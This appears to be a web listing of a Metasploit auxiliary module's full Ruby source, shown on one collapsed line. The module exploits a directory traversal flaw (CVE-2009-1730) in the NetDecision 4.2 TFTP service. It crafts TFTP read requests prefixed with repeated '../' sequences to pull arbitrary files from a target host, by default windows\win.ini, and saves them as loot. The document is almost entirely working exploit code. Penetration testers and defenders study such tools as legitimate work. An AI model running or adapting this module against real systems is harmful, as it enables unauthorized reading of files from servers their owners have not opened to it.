Headline
NetDecision 4.2 TFTP Directory Traversal
This Metasploit modules exploits a directory traversal vulnerability in NetDecision 4.2 TFTP service.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report def initialize(info={}) super(update_info(info, 'Name' => "NetDecision 4.2 TFTP Directory Traversal", 'Description' => %q{ This modules exploits a directory traversal vulnerability in NetDecision 4.2 TFTP service. }, 'License' => MSF_LICENSE, 'Author' => [ 'Rob Kraus', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'References' => [ ['CVE', '2009-1730'], ['OSVDB', '54607'], ['BID', '35002'] ], 'DisclosureDate' => '2009-05-16' )) register_options( [ Opt::RPORT(69), OptInt.new('DEPTH', [false, "Levels to reach base directory",1]), OptString.new('FILENAME', [false, 'The file to loot', 'windows\\win.ini']), ]) end def run_host(ip) # Configure how deep we want to traverse depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH'] # Prepare the filename file_name = "../" * depth file_name << datastore['FILENAME'] # Prepare the packet pkt = "\x00\x01" pkt << file_name pkt << "\x00" pkt << "octet" pkt << "\x00" # We need to reuse the same port in order to receive the data udp_sock = Rex::Socket::Udp.create( { 'Context' => {'Msf' => framework, 'MsfExploit'=>self} } ) add_socket(udp_sock) # Send the packet to target file_data = '' udp_sock.sendto(pkt, ip, datastore['RPORT'].to_i) while (r = udp_sock.recvfrom(65535, 0.1) and r[1]) opcode, block, data = r[0].unpack("nna*") # Parse reply if opcode != 3 # Check opcode: 3 => Data Packet print_error("Error retrieving file #{file_name} from #{ip}") return end file_data << data udp_sock.sendto(tftp_ack(block), r[1], r[2].to_i, 0) # Ack end if file_data.empty? print_error("Error retrieving file #{file_name} from #{ip}") return end udp_sock.close # Output file if verbose vprint_line(file_data.to_s) # Save file to disk path = store_loot( 'netdecision.tftp', 'application/octet-stream', ip, file_data, datastore['FILENAME'] ) print_status("File saved in: #{path}") end # # Returns an Acknowledgement # def tftp_ack(block=1) pkt = "\x00\x04" # Ack pkt << [block].pack("n") # Block Id endend